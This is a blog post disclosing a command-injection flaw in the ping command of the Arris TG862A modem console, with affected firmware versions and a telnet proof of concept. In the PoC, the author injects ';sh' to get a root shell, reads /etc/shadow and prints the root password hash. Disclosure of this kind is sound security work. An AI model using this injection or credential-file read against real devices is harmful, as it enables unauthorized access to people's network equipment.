m0nad's Blog

Just another WordPress.com site

Command injection in Arris modens

with 2 comments

Inspired by the publication of Bernardo Rodrigues for NullByte Conference in his blog(http://w00tsec.blogspot.com.br/2015/11/arris-cable-modem-has-backdoor-in.html) of some command injections (backdoors?) in the restricted shell of Arris modems, i decided to publish another injection of commands that he may not have noticed, in the ‘ping’ feature.

Arris TG862A Command Injection
--
Arris TG862A has a console(ARRIS Console) that within the "System"
context, have a command injection in the ping feature. The password for
the ARRIS Console is the "password of the day".

Version affected
--
Hardware Model:         TG862A
Firmware Name:          TS0705125_062314_MODEL_862_GW
Firmware Revision:      7.5.125
Base Version:           2.0.5.38

PoC
--
```
$ telnet 192.168.100.1
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'.



                           `!MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM::~
                               ``!MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM!:~` ~   
                                    !MMMMMMMMMMMMMMMMMMMMMMM!:`     :~~     
                                     :MMMMMMMMMMMMMMMM!~        :~~~~       
                                   .:MMMMMMMMMM!:~           ~~~~~~         
                              ..:MMMMMMM!:~`             :~~~~~~~           
                         .:MMMMMM:~`                ::~~~~~~~~~             
                    .:MMMMM:~                    .!!!!!!: ~~~~              
              ..:MMM:~`                         .!!!!`      ~               
        ..:MM:~`                                !!`                         
   .:M:~` 


        AA              RRRRRRR          RRRRRRR          III         SSSSS  
       AAAA             RRRRRRRRR        RRRRRRRRR        III       SSSSSSSSS
      AAAAAA            RRR    RRR       RRR    RRR       III      SSS    SS 
     AAA  AAA           RRR   RRRR       RRR   RRRR       III       SSSS     
    AAA    AAA          RRRRRRRRR        RRRRRRRRR        III         SSSSSS 
   AAAAAAAAAAAA         RRR  RRR         RRR  RRR         III            SSSS
  AAA        AAA        RRR   RRR        RRR   RRR        III       SS    SSS
 AA            AA       RRR    RRR       RRR    RRR       III      SSSSSSSSS 
A                A      RRR       R      RRR       R      III        SSSSS   


          ARRIS Enterprises, Inc. 2014 All rights reserved




Enter password> 

Spawning ARRIS Console

Firmware Revision:      7.5.125
[  1] Console> system
[  2] System> ping ;sh
ping -I wan0 ;sh 
BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) multi-call binary

Usage: ping [OPTIONS] HOST



BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /etc/shadow
root:$1$xQWhDWOr$FYNAc2DuT2Q45OY7s2R43/:10063:0:99999:7:::
# 
```

Credits
--
Victor N. Ramos Mello <victornrm () gmail com>

obs: This bug still active in TS0705125D_031115_MODEL_862_GW firmware.

Anúncios

Written by m0nad

novembro 20, 2015 às 6:13 pm

Publicado em Uncategorized

2 Respostas

Subscribe to comments with RSS.

  1. […] pewnie prawnicy się nie zgodzą). Przy okazji jego publikacji odezwał się inny badacz, który udostępnił niezwykle wyrafinowaną technikę podnoszenia uprawnień  w ograniczonej powłoce. W skrócie wygląda ona […]


Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s

%d blogueiros gostam disto: